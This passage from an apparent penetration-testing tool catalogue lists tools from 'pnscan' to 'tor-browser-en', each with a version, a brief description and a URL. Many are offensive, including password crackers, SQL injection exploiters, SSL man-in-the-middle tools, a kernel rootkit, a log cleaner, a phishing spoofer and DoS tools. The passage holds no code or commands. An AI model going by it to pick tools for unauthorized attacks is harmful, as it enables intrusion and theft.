consequences of an overflow in a writable section, of a missing format string, integer overflow, variable misuse, or any other type of memory corruption). http://packetstormsecurity.com/files/104724/Post-Memory-Corruption-Memory-Analyzer.00.html * __pnscan 1.11__ A parallel network scanner that can be used to survey TCP network services. http://www.lysator.liu.se/~pen/pnscan/ * __pompem 69.b2569c4__ A python exploit tool finder. https://github.com/rfunix/Pompem * __portspoof 100.70b6bf2__ This program's primary goal is to enhance OS security through a set of new techniques. http://portspoof.org/ * __posttester 0.1__ A jar file that will send POST requests to servers in order to test for the hash collision vulnerability discussed at the Chaos Communication Congress in Berlin. http://packetstormsecurity.com/files/109010/MagicHash-Collision-Testing-Tool.html * __powerfuzzer 1_beta__ Powerfuzzer is a highly automated web fuzzer based on many other Open Source fuzzers available (incl. cfuzzer, fuzzled, fuzzer.pl, jbrofuzz, webscarab, wapiti, Socket Fuzzer). It can detect XSS, Injections (SQL, LDAP, commands, code, XPATH) and others. http://www.powerfuzzer.com * __powersploit 239.dc1a5e5__ A PowerShell Post-Exploitation Framework. https://github.com/mattifestation/PowerSploit * __praeda 37.093d1c0__ An automated data/information harvesting tool designed to gather critical information from various embedded devices. https://github.com/percx/Praeda * __prometheus 175.497b2ce__ A Firewall analyzer written in ruby https://github.com/averagesecurityguy/prometheus * __propecia 2__ A fast class scanner that scans for a specified open port with banner grabbing http://www.redlevel.org * __protos-sip 2__ SIP test suite. https://www.ee.oulu.fi/research/ouspg/PROTOS_Test-Suite_c07-sip * __proxychains-ng 4.8.1__ A hook preloader that allows to redirect TCP traffic of existing dynamically linked programs through one or more SOCKS or HTTP proxies https://github.com/rofl0r/proxychains * __proxycheck 0.1__ This is a simple proxy tool that checks for the HTTP CONNECT method and grabs verbose output from a webserver. http://packetstormsecurity.com/files/61864/proxycheck.pl.txt.html * __proxyp 2013__ Small multithreaded Perl script written to enumerate latency, port numbers, server names, & geolocations of proxy IP addresses. http://sourceforge.net/projects/proxyp/ * __proxyscan 0.3__ A security penetration testing tool to scan for hosts and ports through a Web proxy server. http://packetstormsecurity.com/files/69778/proxyScan.3.tgz.html * __proxytunnel 1.9.0__ a program that connects stdin and stdout to a server somewhere on the network, through a standard HTTPS proxy http://proxytunnel.sourceforge.net * __pscan 1.3__ A limited problem scanner for C source files http://deployingradius.com/pscan/ * __pshitt 21.85cde65__ A lightweight fake SSH server designed to collect authentication data sent by intruders. https://github.com/regit/pshitt * __pstoreview 1.0__ Lists the contents of the Protected Storage. http://www.ntsecurity.nu/toolbox/pstoreview/ * __ptunnel 0.72__ A tool for reliably tunneling TCP connections over ICMP echo request and reply packets http://www.cs.uit.no/~daniels/PingTunnel/#download * __pwd-hash 2.0__ A password hashing tool that use the crypt function to generate the hash of a string given on standard input. http://vladz.devzero.fr/pwd-hash.php * __pwdump 7.1__ Extracts the binary SAM and SYSTEM file from the filesystem and then the hashes. http://www.tarasco.org/security/pwdump_7/index.html * __pwnat 0.3__ A tool that allows any number of clients behind NATs to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other http://samy.pl/pwnat/ * __pwntools 2.1.3__ The CTF framework used by #Gallopsled in every CTF. https://github.com/Gallopsled/pwntools * __pyew 2.3.0__ A python tool to analyse malware. https://code.google.com/p/pyew/ * __pyfiscan 1015.072ce1e__ Free web-application vulnerability and version scanner. https://github.com/fgeek/pyfiscan * __pyinstaller 2.1__ A program that converts (packages) Python programs into stand-alone executables, under Windows, Linux, Mac OS X, Solaris and AIX. http://www.pyinstaller.org/ * __pyminifakedns 0.1__ Minimal DNS server written in Python; it always replies with a 127.0.0.1 A-record http://code.activestate.com/recipes/491264/ * __pyrasite 2.0__ Code injection and introspection of running Python processes. http://pyrasite.com/ * __pyrit 0.4.0__ WPA/WPA2-PSK attacking with gpu and cluster http://code.google.com/p/pyrit * __pytacle alpha2__ Automates the task of sniffing GSM frames http://packetstormsecurity.com/files/124299/pytacle-alpha2.tar.gz * __pytbull 2.0__ A python based flexible IDS/IPS testing framework shipped with more than 300 tests http://pytbull.sourceforge.net/ * __python-utidylib 0.2__ Python bindings for Tidy HTML parser/cleaner. http://utidylib.berlios.de * __python2-binaryornot 0.3.0__ Ultra-lightweight pure Python package to check if a file is binary or text. https://github.com/audreyr/binaryornot * __python2-yara 3.2.0__ A malware identification and classification tool. https://github.com/plusvic/yara * __quickrecon 0.3.2__ A python script for simple information gathering. It attempts to find subdomain names, perform zone transfers and gathers emails from Google and Bing. http://packetstormsecurity.com/files/104314/QuickRecon.3.2.html radamsa 0.3 General purpose data fuzzer. https://code.google.com/p/ouspg/wiki/Radamsa radare2 0.9.8 Open-source tools to disasm, debug, analyze and manipulate binary files. http://radare.org/ radiography 2 A forensic tool which grabs as much information as possible from a Windows system. http://www.security-projects.com/?RadioGraPhy rainbowcrack 1.2 Password cracker based on the faster time-memory trade-off. With MySQL and Cisco PIX Algorithm patches. http://project-rainbowcrack.com/ rarcrack 0.2 This program uses bruteforce algorithm to find correct password (rar, 7z, zip). http://rarcrack.sourceforge.net/ ratproxy 1.58 A passive web application security assessment tool http://code.google.com/p/ratproxy/ rawr 42.ff1bfa1 Rapid Assessment of Web Resources. A web enumerator. https://bitbucket.org/al14s/rawr/wiki/Home rcracki-mt 0.7.0 A tool to perform rainbow table attacks on password hashes. It is intended for indexed/perfected rainbow tables, mainly generated by the distributed project www.freerainbowtables.com http://rcracki.sourceforge.net/ rdesktop-brute 1.5.0 It connects to windows terminal servers - Bruteforce patch included. http://www.rdesktop.org/ reaver 1.4 Implements a brute force attack against wifi protected setup WPS registrar PINs in order to recover WPA/WPA2 passphrases http://code.google.com/p/reaver-wps rebind 0.3.4 DNS Rebinding Tool http://code.google.com/p/rebind/ recon-ng 885.f42ffbe A full-featured Web Reconnaissance framework written in Python. https://bitbucket.org/LaNMaSteR53/recon-ng recoverjpeg 2.2.2 Recover jpegs from damaged devices. http://www.rfc1149.net/devel/recoverjpeg recstudio 4.0_20130717 Cross platform interactive decompiler http://www.backerstreet.com/rec/rec.htm redfang 2.5 Finds non-discoverable Bluetooth devices by brute-forcing the last six bytes of the devices' Bluetooth addresses and calling read_remote_name(). http://packetstormsecurity.com/files/31864/redfang.2.5.tar.gz.html redirectpoison 1.1 A tool to poison a targeted issuer of SIP INVITE requests with 301 (i.e. Moved Permanently) redirection responses. http://www.hackingexposedvoip.com/ regeorg 26.22fb8a9 The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. https://github.com/sensepost/reGeorg reglookup 1.0.1 Command line utility for reading and querying Windows NT registries http://projects.sentinelchicken.org/reglookup relay-scanner 1.7 An SMTP relay scanner. http://www.cirt.dk replayproxy 1.1 Forensic tool to replay web-based attacks (and also general HTTP traffic) that were captured in a pcap file. https://code.google.com/p/replayproxy/ responder 117.6c7a5dd A LLMNR and NBT-NS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. https://github.com/SpiderLabs/Responder/ rfcat 130515 RF ChipCon-based Attack Toolset http://code.google.com/p/rfcat rfdump 1.6 A back-end GPL tool to directly inter-operate with any RFID ISO-Reader to make the contents stored on RFID tags accessible http://www.rfdump.org rfidiot e302bb7 An open source python library for exploring RFID devices. http://rfidiot.org/ rfidtool 0.01 A opensource tool to read / write rfid tags http://www.bindshell.net/tools/rfidtool.html ridenum 39.ebbfaca A null session RID cycle attack for brute forcing domain controllers. https://github.com/trustedsec/ridenum rifiuti2 0.5.1 A rewrite of rifiuti, a great tool from Foundstone folks for analyzing Windows Recycle Bin INFO2 file. https://code.google.com/p/rifiuti2/ rinetd 0.62 internet redirection server http://www.boutell.com/rinetd ripdc 0.2 A script which maps domains related to an given ip address or domainname. http://nullsecurity.net/tools/scanner rkhunter 1.4.2 Checks machines for the presence of rootkits and other unwanted tools. http://rkhunter.sourceforge.net/ rlogin-scanner 0.2 Multithreaded rlogin scanner. Tested on Linux, OpenBSD and Solaris. http://wayreth.eu.org/old_page/ rootbrute 0.1 Local root account bruteforcer. http://www.packetstormsecurity.org/ ropeadope 1.1 A linux log cleaner. http://www.highhacksociety.com/ ropeme 1.0 ROPME is a set of python scripts to generate ROP gadgets and payload. http://www.vnsecurity.net/2010/08/ropeme-rop-exploit-made-easy/ ropgadget 5.3 Lets you search your gadgets on your binaries (ELF format) to facilitate your ROP exploitation. https://github.com/JonathanSalwan/ROPgadget ropper 91.212d5da It can show information about files in different file formats and you can find gadgets to build rop chains for different architectures. For disassembly ropper uses the awesome Capstone Framework. https://github.com/sashs/Ropper rpdscan 2.a71b0f3 Remmina Password Decoder and scanner. https://github.com/freakyclown/RPDscan rrs 1.70 A reverse (connecting) remote shell. Instead of listening for incoming connections it will connect out to a listener (rrs in listen mode). With tty support and more. http://www.cycom.se/dl/rrs rsakeyfind 1.0 A tool to find RSA key in RAM. http://citp.princeton.edu/memory/code/ rsmangler 1.4 rsmangler takes a wordlist and mangle it http://www.randomstorm.com/rsmangler-security-tool.php rtlsdr-scanner 856.a47ba2e A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library. https://github.com/EarToEarOak/RTLSDR-Scanner rtp-flood 1.0 RTP flooder http://www.hackingexposedvoip.com/ rtpbreak 1.3a Detects, reconstructs and analyzes any RTP session http://xenion.antifork.org/rtpbreak/ rubilyn 0.0.1 64bit Mac OS-X kernel rootkit that uses no hardcoded address to hook the BSD subsystem in all OS-X Lion & below. It uses a combination of syscall hooking and DKOM to hide activity on a host. http://nullsecurity.net/tools/backdoor.html ruby-msgpack 0.5.8 MessagePack, a binary-based efficient data interchange format. http://msgpack.org/ ruby-ronin 1.5.0 A Ruby platform for exploit development and security research. http://ronin-ruby.github.io/ ruby-ronin-support 0.5.1 A support library for Ronin. http://ronin-ruby.github.io/ ruby-uri-query_params 0.7.0 Access the query parameters of a URI, just like in PHP. http://github.com/postmodern/uri-query_params rww-attack 0.9.2 The Remote Web Workplace Attack tool will perform a dictionary attack against a live Microsoft Windows Small Business Server's 'Remote Web Workplace' portal. It currently supports both SBS 2003 and SBS 2008 and includes features to avoid account lock out. http://packetstormsecurity.com/files/79021/Remote-Web-Workplace-Attack-Tool.html safecopy 1.7 A disk data recovery tool to extract data from damaged media http://safecopy.sourceforge.net/ sakis3g 0.2.0e An all-in-one script for connecting with 3G http://www.sakis3g.org/ sambascan 0.5.0 Allows you to search an entire network or a number of hosts for SMB shares. It will also list the contents of all public shares that it finds. http://sourceforge.net/projects/sambascan2/ samdump2 3.0.0 Dump password hashes from a Windows NT/2k/XP installation http://sourceforge.net/projects/ophcrack/files/samdump2/ samydeluxe 2.2ed1bac Automatic samdump creation script. http://github.com/jensp/samydeluxe sandy 6.531ab16 An open-source Samsung phone encryption assessment framework https://github.com/donctl/sandy sasm 3.1.0 A simple crossplatform IDE for NASM, MASM, GAS and FASM assembly languages. https://github.com/Dman95/SASM sb0x 19.04f40fe A simple and Lightweight framework for Penetration testing. https://github.com/levi0x0/sb0x-project sbd 1.36 Netcat-clone, portable, offers strong encryption - features AES-CBC + HMAC-SHA1 encryption, program execution (-e), choosing source port, continuous reconnection with delay + more http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=sbd scalpel 2.0 A frugal, high performance file carver http://www.digitalforensicssolutions.com/Scalpel/ scanmem 0.13 A utility used to locate the address of a variable in an executing process. http://code.google.com/p/scanmem/ scanssh 2.1 Fast SSH server and open proxy scanner. http://www.monkey.org/~provos/scanssh/ scapy 2.2.0 A powerful interactive packet manipulation program written in Python http://www.secdev.org/projects/scapy/ schnappi-dhcp 0.1 schnappi can fuck network with no DHCP http://www.emanuelegentili.eu/ scout2 196.7cc58b4 Security auditing tool for AWS environments. http://isecpartners.github.io/Scout2/ scrapy 4419.c485a05 A fast high-level scraping and web crawling framework. http://www.scrapy.org/ scrounge-ntfs 0.9 Data recovery program for NTFS file systems http://memberwebs.com/stef/software/scrounge/ sctpscan 1.0 A network scanner for discovery and security http://www.p1sec.com/ seat 0.3 Next generation information digging application geared toward the needs of security professionals. It uses information stored in search engine databases, cache repositories, and other public resources to scan web sites for potential vulnerabilities. http://thesprawl.org/projects/search-engine-assessment-tool/ secscan 1.5 Web Apps Scanner and Much more utilities. http://code.google.com/p/secscan-py/ secure-delete 3.1 Secure file, disk, swap, memory erasure utilities. http://www.thc.org/ sees 67.cd741aa Increase the success rate of phishing attacks by sending emails to company users as if they are coming from the very same company's domain. https://github.com/galkan/sees/ sergio-proxy 0.2.1 A multi-threaded transparent HTTP proxy for manipulating web traffic https://github.com/darkoperator/dnsrecon sessionlist 1.0 Sniffer that intents to sniff HTTP packets and attempts to reconstruct interesting authentication data from websites that do not employ proper secure cookie auth. http://www.0xrage.com/ set 6.1.2 Social-engineer toolkit. Aimed at penetration testing around Social-Engineering https://www.trustedsec.com/downloads/social-engineer-toolkit sfuzz 0.7.0 A simple fuzzer. http://aconole.brad-x.com/programs/sfuzz.html shellcodecs 0.1 A collection of shellcode, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process. http://www.blackhatlibrary.net/Shellcodecs shellme 3.8c7919d Because sometimes you just need shellcode and opcodes quickly. This essentially just wraps some nasm/objdump calls into a neat script. https://github.com/hatRiot/shellme shellnoob 2.1 A toolkit that eases the writing and debugging of shellcode https://github.com/reyammer/shellnoob shortfuzzy 0.1 A web fuzzing script written in perl. http://packetstormsecurity.com/files/104872/Short-Fuzzy-Rat-Scanner.html sidguesser 1.0.5 Guesses sids/instances against an Oracle database according to a predefined dictionary file. http://www.cqure.net/wp/tools/database/sidguesser/ siege 3.0.8 An http regression testing and benchmarking utility http://www.joedog.org/JoeDog/Siege silk 3.9.0 A collection of traffic analysis tools developed by the CERT NetSA to facilitate security analysis of large networks. https://tools.netsa.cert.org/silk/ simple-ducky 1.1.1 A payload generator. https://code.google.com/p/simple-ducky-payload-generator simple-lan-scan 1.0 A simple python script that leverages scapy for discovering live hosts on a network. http://packetstormsecurity.com/files/97353/Simple-LAN-Scanner.0.html sinfp 1.22 A full operating system stack fingerprinting suite. http://www.networecon.com/tools/sinfp/ siparmyknife 11232011 A small command line tool for developers and administrators of Session Initiation Protocol (SIP) applications. http://packetstormsecurity.com/files/107301/sipArmyKnife_11232011.pl.txt sipcrack 0.2 A SIP protocol login cracker. http://www.remote-exploit.org/codes_sipcrack.html sipp 3.3 A free Open Source test tool / traffic generator for the SIP protocol. http://sipp.sourceforge.net/ sipsak 0.9.6 A small command line tool for developers and administrators of Session Initiation Protocol (SIP) applications. http://sipsak.org sipscan 0.1 A sip scanner. http://www.hackingvoip.com/sec_tools.html sipshock 6.1d636ab A scanner for SIP proxies vulnerable to Shellshock. https://github.com/zaf/sipshock sipvicious 0.2.8 Tools for auditing SIP devices http://blog.sipvicious.org skipfish 2.10b A fully automated, active web application security reconnaissance tool http://code.google.com/p/skipfish/ skyjack 7.5f7a25e Takes over Parrot drones, deauthenticating their true owner and taking over control, turning them into zombie drones under your own control. https://github.com/samyk/skyjack skype-dump 0.1 This is a tool that demonstrates dumping MD5 password hashes from the configuration file in Skype. http://packetstormsecurity.com/files/119155/Skype-Hash-Dumper.0.html skypefreak 30.14a81cb A Cross Platform Forensic Framework for Skype. http://osandamalith.github.io/SkypeFreak/ sleuthkit 4.1.3 File system and media management forensic analysis tools http://www.sleuthkit.org/sleuthkit slowhttptest 1.5 A highly configurable tool that simulates application layer denial of service attacks http://code.google.com/p/slowhttptest slowloris 0.7 A tool which is written in perl to test http-server vulnerabilites for connection exhaustion denial of service (DoS) attacks so you can enhance the security of your webserver. http://ha.ckers.org/slowloris/ smali 1.4.1 An assembler/disassembler for Android's dex format http://code.google.com/p/smali/ smartphone-pentest-framework 95.20918b2 Repository for the Smartphone Pentest Framework (SPF). https://github.com/georgiaw/Smartphone-Pentest-Framework smbbf 0.9.1 SMB password bruteforcer. http://packetstormsecurity.com/files/25381/smbbf.9.1.tar.gz.html smbexec 148.7827616 A rapid psexec style attack with samba tools. https://github.com/pentestgeek/smbexec smbrelay 3 SMB / HTTP to SMB replay attack toolkit. http://www.tarasco.org/security/smbrelay/ smtp-fuzz 1.0 Simple smtp fuzzer none smtp-user-enum 1.2 Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY or RCPT TO. http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum smtp-vrfy 1.0 An SMTP Protocol Hacker. smtpmap 0.8.234_BETA Tool to identify the running smtp software on a given host. http://www.projectiwear.org/~plasmahh/software.html smtpscan 0.5 An SMTP scanner http://packetstormsecurity.com/files/31102/smtpscan.5.tar.gz.html sn00p 0.8 A modular tool written in bourne shell and designed to chain and automate security tools and tests. http://www.nullsecurity.net/tools/automation.html sniffjoke 0.4.1 Injects packets in the transmission flow that are able to seriously disturb passive analysis like sniffing, interception and low level information theft. http://www.delirandom.net/sniffjoke/ snmp-fuzzer 0.1.1 SNMP fuzzer uses Protos test cases with an entirely new engine written in Perl. http://www.arhont.com/en/category/resources/tools-utilities/ snmpattack 1.8 SNMP scanner and attacking tool. http://www.c0decafe.de/ snmpcheck 1.8 A free open source utility to get information via SNMP protocols. http://www.nothink.org/perl/snmpcheck/ snmpenum 1.7 snmp enumerator http://www.filip.waeytens.easynet.be/ snmpscan 0.1 A free, multi-processes SNMP scanner http://www.nothink.org/perl/snmpscan/index.php snoopy-ng 93.e305420 A distributed, sensor, data collection, interception, analysis, and visualization framework. https://github.com/sensepost/snoopy-ng snort 2.9.6.1 A lightweight network intrusion detection system. http://www.snort.org snow 20130616 Steganography program for concealing messages in text files. http://darkside.com.au/snow/index.html snscan 1.05 A Windows based SNMP detection utility that can quickly and accurately identify SNMP enabled devices on a network. http://www.mcafee.com/uk/downloads/free-tools/snscan.aspx socat 1.7.2.4 Multipurpose relay http://www.dest-unreach.org/socat/ soot 2.5.0 A Java Bytecode Analysis and Transformation Framework. http://www.sable.mcgill.ca/soot spade 114 A general-purpose Internet utility package, with some extra features to help in tracing the source of spam and other forms of Internet harassment. http://www.hoobie.net/brutus/ sparty 0.1 An open source tool written in python to audit web applications using sharepoint and frontpage architecture. http://sparty.secniche.org/ spectools 2010_04_R1 Spectrum-Tools is a set of utilities for using the Wi-Spy USB spectrum analyzer hardware. Stable version. http://www.kismetwireless.net/spectools/ speedpwn 8.3dd2793 An active WPA/2 Bruteforcer, original created to prove weak standard key generation in different ISP labeled routers without a client is connected. https://gitorious.org/speedpwn/ spiderfoot 2.1.5 The Open Source Footprinting Tool http://spiderfoot.net/ spiderpig-pdffuzzer 0.1 A javascript pdf fuzzer https://code.google.com/p/spiderpig-pdffuzzer/ spiga 7240.3a804ac Configurable web resource scanner https://github.com/getdual/scripts-n-tools/blob/master/spiga.py spike 2.9 IMMUNITYsec's fuzzer creation kit in C http://www.immunitysec.com/resources-freesoftware.shtml spike-proxy 148 A Proxy for detecting vulnerabilities in web applications http://www.immunitysec.com/resources-freesoftware.shtml spiped 1.4.1 A utility for creating symmetrically encrypted and authenticated pipes between socket addresses. https://www.tarsnap.com/spiped.html spipscan 8340.db8ef4a SPIP (CMS) scanner for penetration testing purpose written in Python. https://github.com/PaulSec/SPIPScan splint 3.1.2 A tool for statically checking C programs for security vulnerabilities and coding mistakes http://www.splint.org/ sploitctl 1.1 Fetch, install and search exploit archives from exploit sites like exploit-db and packetstorm. https://github.com/BlackArch/sploitctl sploitego 153.d9568dc Maltego Penetration Testing Transforms. https://github.com/allfro/sploitego spooftooph 0.5.2 Designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain sight http://www.hackfromacave.com/projects/spooftooph.html sps 4.2 A Linux packet crafting tool. Supports IPv4, IPv6 including extension headers, and tunneling IPv6 over IPv4. https://sites.google.com/site/simplepacketsender/ sqid 0.3 A SQL injection digger. http://sqid.rubyforge.org/ sqlbrute 1.0 Brute forces data out of databases using blind SQL injection. http://www.justinclarke.com/archives/2006/03/sqlbrute.html sqlmap 6445.20c272b An automatic SQL injection tool developed in Python. http://sqlmap.sourceforge.net sqlninja 0.2.6_r1 A tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end http://sqlninja.sourceforge.net/ sqlpat 1.0.1 This tool should be used to audit the strength of Microsoft SQL Server passwords offline. http://www.cqure.net/wp/sqlpat/ sqlping 4 SQL Server scanning tool that also checks for weak passwords using wordlists. http://www.sqlsecurity.com/downloads sqlsus 0.7.2 An open source MySQL injection and takeover tool, written in perl http://sqlsus.sourceforge.net/ ssh-privkey-crack 0.3 A SSH private key cracker https://code.google.com/p/lusas/ sshatter 1.2 Password bruteforcer for SSH http://www.nth-dimension.org.uk/downloads.php?id=34 sshscan 7401.3bfd4ae A horizontal SSH scanner that scans large swaths of IPv4 space for a single SSH user and pass. https://github.com/getdual/scripts-n-tools/blob/master/sshscan.py sshtrix 0.0.2 A very fast multithreaded SSH login cracker http://nullsecurity.net/tools/cracker.html sshuttle 198.9ce2fa0 Transparent proxy server that works as a poor man's VPN. Forwards all TCP packets over ssh (and even DNS requests when using --dns option). Doesn't require admin privileges on the server side. https://github.com/apenwarr/sshuttle ssl-hostname-resolver 1 CN (Common Name) grabber on X.509 Certificates over HTTPS. http://packetstormsecurity.com/files/120634/Common-Name-Grabber-Script.html ssl-phuck3r 2.0 All in one script for Man-In-The-Middle attacks. https://github.com/zombiesam/ssl_phuck3r sslcat 1.0 SSLCat is a simple Unix utility that reads and writes data across an SSL enable network connection. http://www.bindshell.net/tools/sslcat sslcaudit 522.5b6be3e Utility to perform security audits of SSL/TLS clients. https://github.com/grwl/sslcaudit ssldump 0.9b3 an SSLv3/TLS network protocol analyzer http://www.rtfm.com/ssldump/ sslh 1.16 SSL/SSH/OpenVPN/XMPP/tinc port multiplexer http://www.rutschle.net/tech/sslh.shtml sslmap 0.2.0 A lightweight TLS/SSL cipher suite scanner. http://thesprawl.org/projects/latest/ sslnuke 5.c5faeaa Transparent proxy that decrypts SSL traffic and prints out IRC messages. https://github.com/jtripper/sslnuke sslscan 239.1328b49 Tests SSL/TLS enabled services to discover supported cipher suites. https://github.com/DinoTools/sslscan sslsniff 0.8 A tool to MITM all SSL connections on a LAN and dynamically generate certs for the domains that are being accessed on the fly http://www.thoughtcrime.org/software/sslsniff/ sslsplit 0.4.9 A tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. http://www.roe.ch/SSLsplit sslstrip 0.9 Transparently hijack http traffic on a network, watch for https links and redirects, then map those links. http://www.thoughtcrime.org/software/sslstrip sslyze 0.10 Python tool for analyzing the configuration of SSL servers and for identifying misconfigurations. https://github.com/nabla-c0d3/sslyze/ stackflow 2.2af525d Universal stack-based buffer overfow exploitation tool. https://github.com/d4rkcat/stackflow starttls-mitm 7.b257756 A mitm proxy that will transparently proxy and dump both plaintext and TLS traffic. https://github.com/ipopov/starttls-mitm statsprocessor 0.10 A high-performance word-generator based on per-position Markov-attack. http://hashcat.net/wiki/doku.php?id=statsprocessor steghide 0.5.1 Embeds a message in a file by replacing some of the least significant bits http://steghide.sourceforge.net stompy 0.0.4 an advanced utility to test the quality of WWW session identifiers and other tokens that are meant to be unpredictable. http://lcamtuf.coredump.cx/ storm-ring 0.1 This simple tool is useful to test a PABX with "allow guest" parameter set to "yes" (in this scenario an anonymous caller could place a call). http://packetstormsecurity.com/files/115852/Storm-Ringing-PABX-Test-Tool.html stunnel 5.06 A program that allows you to encrypt arbitrary TCP connections inside SSL http://www.stunnel.org subdomainer 1.2 A tool designed for obtaining subdomain names from public sources. http://www.edge-security.com/subdomainer.php subterfuge 5.0 Automated Man-in-the-Middle Attack Framework http://kinozoa.com sucrack 1.2.3 A multi-threaded Linux/UNIX tool for brute-force cracking local user accounts via su http://labs.portcullis.co.uk/application/sucrack sulley 1.0.cb5e62c A pure-python fully automated and unattended fuzzing framework. https://github.com/OpenRCE/sulley/ superscan 4 Powerful TCP port scanner, pinger, resolver. http://www.foundstone.com/us/resources/proddesc/superscan.htm suricata 2.0.3 An Open Source Next Generation Intrusion Detection and Prevention Engine. http://openinfosecfoundation.org/index.php/download-suricata svn-extractor 28.3af00fb A simple script to extract all web resources by means of .SVN folder exposed over network. https://github.com/anantshri/svn-extractor swaks 20130209.0 Swiss Army Knife SMTP; Command line SMTP testing, including TLS and AUTH http://jetmore.org/john/code/swaks/ swfintruder 0.9.1 First tool for testing security in Flash movies. A runtime analyzer for SWF external movies. It helps to find flaws in Flash. http://code.google.com/p/swfintruder/ synflood 0.1 A very simply script to illustrate DoS SYN Flooding attack. http://thesprawl.org/projects/syn-flooder/ synner 1.1 A custom eth->ip->tcp packet generator (spoofer) for testing firewalls and dos attacks. http://packetstormsecurity.com/files/69802/synner.c.html synscan 5.02 fast asynchronous half-open TCP portscanner http://www.digit-labs.org/files/tools/synscan/ sysdig 1314.45921f5 Open source system-level exploration and troubleshooting tool. http://www.sysdig.org/ sysinternals-suite 1.2 Sysinternals tools suite. http://sysinternals.com/ t50 5.4.1 Experimental Multi-protocol Packet Injector Tool http://t50.sourceforge.net/ taof 0.3.2 Taof is a GUI cross-platform Python generic network protocol fuzzer. http://taof.sf.net tbear 1.5 Transient Bluetooth Environment Auditor includes an ncurses-based Bluetooth scanner (a bit similar to kismet), a Bluetooth DoS tool, and a Bluetooth hidden device locator. http://freshmeat.net/projects/t-bear tcgetkey 0.1 A set of tools that deal with acquiring physical memory dumps via FireWire and then scan the memory dump to locate TrueCrypt keys and finally decrypt the encrypted TrueCrypt container using the keys. http://packetstormsecurity.com/files/119146/tcgetkey.1.html tcpcontrol-fuzzer 0.1 2^6 TCP control bit fuzzer (no ECN or CWR). https://www.ee.oulu.fi/research/ouspg/tcpcontrol-fuzzer tcpdump 4.6.2 A tool for network monitoring and data acquisition http://www.tcpdump.org tcpextract 1.1 Extracts files from captured TCP sessions. Support live streams and pcap files. https://pypi.python.org/pypi/tcpextract/1.1 tcpflow 1.4.4 Captures data transmitted as part of TCP connections then stores the data conveniently http://afflib.org/software/tcpflow tcpick 0.2.1 TCP stream sniffer and connection tracker http://tcpick.sourceforge.net/ tcpjunk 2.9.03 A general tcp protocols testing and hacking utility http://code.google.com/p/tcpjunk tcpreplay 4.0.5 Gives the ability to replay previously captured traffic in a libpcap format http://tcpreplay.appneta.com tcptraceroute 1.5beta7 A traceroute implementation using TCP packets. http://michael.toren.net/code/tcptraceroute/ tcpwatch 1.3.1 A utility written in Python that lets you monitor forwarded TCP connections or HTTP proxy connections. http://hathawaymix.org/Software/TCPWatch tcpxtract 1.0.1 A tool for extracting files from network traffic. http://tcpxtract.sourceforge.net teardown 1.0 Command line tool to send a BYE request to tear down a call. http://www.hackingexposedvoip.com/ tekdefense-automater 52.6d0bd5a IP URL and MD5 OSINT Analysis https://github.com/1aN0rmus/TekDefense-Automater termineter 0.1.0 Smart meter testing framework https://code.google.com/p/termineter/ tftp-bruteforce 0.1 TFTP-bruteforcer is a fast TFTP filename bruteforcer written in perl. http://www.hackingexposedcisco.com/ tftp-fuzz 1337 Master TFTP fuzzing script as part of the ftools series of fuzzers http://nullsecurity.net/tools/fuzzer.html tftp-proxy 0.1 This tool accepts connection on tftp and reloads requested content from an upstream tftp server. Meanwhile modifications to the content can be done by pluggable modules. So this one's nice if your mitm with some embedded devices. http://www.c0decafe.de/ thc-ipv6 2.5 A complete tool set to attack the inherent protocol weaknesses of IPv6 and ICMP6, and includes an easy to use packet factory library. http://thc.org/thc-ipv6/ thc-keyfinder 1.0 Finds crypto keys, encrypted data and compressed data in files by analyzing the entropy of parts of the file. https://www.thc.org/releases.php thc-pptp-bruter 0.1.4 A brute force program that works against pptp vpn endpoints (tcp port 1723). http://www.thc.org thc-smartbrute 1.0 This tool finds undocumented and secret commands implemented in a smartcard. https://www.thc.org/thc-smartbrute/ thc-ssl-dos 1.4 A tool to verify the performance of SSL. To be used in your authorized and legitimate area ONLY. You need to accept this to make use of it, no use for bad intentions, you have been warned! http://www.thc.org/thc-ssl-dos/ theharvester 2.2a Python tool for gathering e-mail accounts and subdomain names from different public sources (search engines, pgp key servers) http://www.edge-security.com/theHarvester.php themole 0.3 Automatic SQL injection exploitation tool. http://sourceforge.net/projects/themole/ tiger 3.2.3 A security scanner, that checks computer for known problems. Can also use tripwire, aide and chkrootkit. http://www.nongnu.org/tiger/ tilt 90.2bc2ef2 An easy and simple tool implemented in Python for ip reconnaissance, with reverse ip lookup. https://github.com/AeonDave/tilt timegen 0.4 This program generates a *.wav file to "send" an own time signal to DCF77 compatible devices. http://bastianborn.de/radio-clock-hack/ tinc 1.0.24 VPN (Virtual Private Network) daemon http://www.tinc-vpn.org/ tinyproxy 1.8.3 A light-weight HTTP proxy daemon for POSIX operating systems. https://banu.com/tinyproxy/ tlsenum 75.6618285 A command line tool to enumerate TLS cipher-suites supported by a server. https://github.com/Ayrx/tlsenum tlspretense 0.6.2 SSL/TLS client testing framework https://github.com/iSECPartners/tlspretense tlssled 1.3 A Linux shell script whose purpose is to evaluate the security of a target SSL/TLS (HTTPS) web server implementation. http://blog.taddong.com/2011/05/tlssled-v10.html tnscmd 1.3 a lame tool to prod the oracle tnslsnr process (1521/tcp) http://www.jammed.com/~jwa/hacks/security/tnscmd/ topera 19.3e230fd An IPv6 security analysis toolkit, with the particularity that their attacks can't be detected by Snort. https://github.com/toperaproject/topera tor 0.2.5.10 Anonymizing overlay network. http://www.torproject.org/ tor-autocircuit 0.2 Tor Autocircuit was developed to give users a finer control over Tor circuit creation. The tool exposes the functionality of TorCtl library which allows its users to control circuit length, speed, geolocation, and other parameters. http://www.thesprawl.org/projects/tor-autocircuit/ tor-browser-en 4.0.2 Tor Browser Bundle: Anonymous browsing using firefox and tor https://www.torproject.org/projects/torbrowser.html.en 